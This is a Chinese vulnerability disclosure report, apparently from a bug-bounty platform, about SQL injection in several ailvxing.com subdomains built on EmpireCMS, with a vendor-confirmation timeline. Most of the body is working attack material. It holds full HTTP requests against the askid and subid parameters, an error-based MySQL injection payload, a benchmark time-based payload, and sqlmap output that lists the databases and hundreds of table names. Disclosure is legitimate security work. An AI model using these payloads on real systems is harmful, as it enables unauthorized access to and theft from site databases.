2015-10-23: 细节已通知厂商并且等待厂商处理中 2015-10-23: 厂商已经确认,细节仅向厂商公开 2015-11-02: 细节向核心白帽子及相关领域专家公开 2015-11-12: 细节向普通白帽子公开 2015-11-22: 细节向实习白帽子公开 2015-12-07: 细节向公众公开
RT
1、网站gti.ailvxing.com参数askid
GET /e/ask/getInfo.php?enews=getreply&askid= HTTP/1.1Referer: http://gti.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: gti.ailvxing.comCookie: dicvacst34=EmpireCMS_stats; dicvacst35=EmpireCMS_stats; dicvacst31=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst58=EmpireCMS_stats; dicvacst55=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst54=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvalastsearchtime=1445404741; dicvamybuycar=%7C36%2C196%7C%7C1%21%7C86%2C6%7C%7C1%21%7C32%2C271%7C%7C1%21%7C110%2C440%7C%7C1%21; dicvareturnurl=http%3A%2F%2Fgti.ailvxing.com%2Fe%2Fmember%2Flogin%2F; PHPSESSID=olt6q5223euuecur6udl37h820Accept-Encoding: gzip, deflate---Place: GETParameter: askid Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause Payload: enews=getreply&askid=-2174 OR (SELECT 7745 FROM(SELECT COUNT(*),CONCAT(0x716c6f6371,(SELECT (CASE WHEN (7745=7745) THEN 1 ELSE 0 END)),0x7179627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---[04:05:45] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Apacheback-end DBMS: MySQL 5.0[04:05:45] [INFO] fetching database names[04:05:46] [INFO] the SQL query used returns 3 entries[04:05:46] [INFO] resumed: information_schema[04:05:46] [INFO] resumed: ailvxing2015[04:05:46] [INFO] resumed: testavailable databases [3]:[*] ailvxing2015[*] information_schema[*] test
2、网站hanchao.ailvxing.com,2处注入askid参数
GET /e/ask/getInfo.php?enews=getreply&askid=' HTTP/1.1Referer: http://hanchao.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: hanchao.ailvxing.comCookie: dicvacst35=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; dicvacst34=EmpireCMS_stats; dicvacst32=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst55=EmpireCMS_stats; dicvacst58=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst54=EmpireCMS_stats; dicvalastsearchtime=1445410355; dicvamybuycar=%7C70%2C27%7C%7C1%21%7C32%2C273%7C%7C1%21%7C82%2C557%7C%7C1%21%7C24%2C366%7C%7C1%21%7C77%2C11%7C%7C1%21; dicvareturnurl=http%3A%2F%2Fhanchao.ailvxing.com%2Fe%2Fmember%2Flogin%2F; PHPSESSID=is9f01madkpa84jt1808e0lpm7Accept-Encoding: gzip, deflateHTTP/1.1 200 OKDate: Wed, 21 Oct 2015 06:57:43 GMTServer: ApacheX-Powered-By: PHP/5.3.3Content-Length: 301Content-Type: text/html; charset=utf-8You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by newstime asc' at line 1<br>select id,classid,userid,replytext,diggtop,digger,newstime from ***_ecms_ask_reply where askid=' order by newstime asc
subid参数
GET /e/visa/index.php/?enews=showsample&subid=340%2bbenchmark(20000000%2csha1(1))%2b HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://hanchao.ailvxing.com/info-36-124-0.htmlX-Requested-With: XMLHttpRequestCache-Control: no-cacheHost: hanchao.ailvxing.comCookie: dicvacst114=EmpireCMS_stats; dicvacst116=EmpireCMS_stats; dicvacst31=EmpireCMS_stats; dicvacst36=EmpireCMS_stats; dicvacst35=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; dicvacst34=EmpireCMS_stats; dicvacst32=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst55=EmpireCMS_stats; dicvacst58=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst54=EmpireCMS_statsAccept-Encoding: gzip, deflateHTTP/1.1 200 OKDate: Wed, 21 Oct 2015 06:51:51 GMTServer: ApacheX-Powered-By: PHP/5.3.3Content-Length: 240Content-Type: text/html; charset=utf-8You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1<br>select id,text,sample from ***_ecms_visa_subdata where id=340+benchmark(20000000,sha1(1))+
3 qyer.ailvxing.com 参数askid 和subid
GET /e/ask/getInfo.php?enews=getreply&askid='
4xianlvke.ailvxing.com 参数askid 和subid
5qy.ailvxing.com
GET /e/visa/index.php/?enews=showsample&subid=5
Database: ailvxing2015 [416 tables]+----------------------------------+| alx_alx_accitem || alx_alx_acckemu || alx_alx_agent || alx_alx_booking || alx_alx_cardname || alx_alx_cardname_log || alx_alx_ddlog || alx_alx_finance || alx_alx_finance_log || alx_alx_mailtemp || alx_alx_sendmail || alx_alx_sendmail_check || alx_alx_smsreply || alx_alx_smssend || alx_alx_smssend_check || alx_alx_smstemp || alx_alx_tixing || alx_alx_user_finance || alx_alx_user_info || alx_alx_user_pay || alx_ecms_article || alx_ecms_article_check || alx_ecms_article_check_data || alx_ecms_article_data_1 || alx_ecms_article_doc || alx_ecms_article_doc_data |
危害等级:高
漏洞Rank:20
确认时间:2015-10-23 09:46
马上处理,谢谢!
暂无
